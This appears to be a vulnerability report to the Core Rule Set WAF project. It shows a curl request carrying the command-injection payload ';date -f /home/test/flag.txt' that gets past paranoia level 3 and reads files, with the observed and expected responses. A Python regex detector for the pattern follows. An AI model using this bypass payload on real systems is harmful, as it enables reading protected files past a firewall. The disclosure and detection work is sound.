Open
Description
Hello, Everyone
I tried this bypass.
C:\Users\RelunSec>curl -ig -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level: 3" --data-urlencode "q=;date -f /home/test/flag.txt" "https://sandbox.coreruleset.org/"
Observed behavior/Response:
HTTP/1.1 200 OK
Date: Mon, 22 Dec 2025 07:47:18 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
X-Unique-ID: aUj3hp-Wah1OgdCxchC5KgAAAIE
x-backend: apache-latest
x-crs-last-commit: none
Expected behavior/Response:
HTTP/1.1 403 Forbidden
Date: Mon, 22 Dec 2025 07:47:18 GMT
Content-Type: text/plain; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
X-Unique-ID: aUj6wt6Zvfw_C_zpED5j9gAAAUI
x-backend: apache-latest
x-crs-last-commit: none
932236 PL2 Remote Command Execution: Unix Command Injection (command without evasion)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 5)
980170 PL? Anomaly Scores: (Inbound Scores: blocking=5, detection=5, per_pl=0-5-0-0, threshold=5) - (Outbound Scores: blocking=0, detection=0, per_pl=0-0-0-0, threshold=4) - (SQLI=0, XSS=0, RFI=0, LFI=0, RCE=5, PHPI=0, HTTP=0, SESS=0, COMBINED_SCORE=5)
Even PL3, the highest level and mostly used in critical services, is vulnerable to this bypass.
Impact:
The attacker does not need anything: date is already installed on Linux, and an attacker can read files even if others are blocked. An attacker can brute-force available home files or read files that are not blocked by the WAF. If the .ssh dir is blocked, an attacker can read /home/testuser/InternalTestReportsCompany.txt without it being blocked, because it is a custom file.
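Added example, not part of the original issue and not CRS project code: a log-triage check that flags form parameters in which a shell separator is followed by `date` with its `-f`/`--file` option, the pattern in the request above. The function name, the regex and the sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Start of value or a shell separator, then `date`, then a -f / --file option
# within the same command (the match never crosses another separator).
DATE_FILE_READ = re.compile(
    r"(?:^|[;&|`\n]|\$\()\s*date\b[^;&|\n]*?\s(?:-[a-zA-Z]*f|--f[a-z]*)"
)


def flag_date_file_read(body: str) -> list[tuple[str, str]]:
    """Return (parameter, decoded value) pairs that look like `date -f <file>`.

    `body` is an application/x-www-form-urlencoded request body or query
    string, as found in an access or audit log.
    """
    hits = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        # parse_qsl has already percent-decoded the value, so the regex
        # sees what the backend would see.
        if DATE_FILE_READ.search(value):
            hits.append((name, value))
    return hits


# Constructed sample bodies. The first is the encoded form of the request
# in the report; the others are benign look-alikes that must not be flagged.
SAMPLE_BODIES = [
    "q=%3Bdate%20-f%20%2Fhome%2Ftest%2Fflag.txt",
    "q=update+-f+today",
    "note=release+date+-f+friday",
    "when=date+-d+tomorrow%3B+ls+-f",
    "q=%3Bdate",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        verdict = "FLAG" if flag_date_file_read(body) else "ok"
        print(f"{verdict:4} {body}")
```
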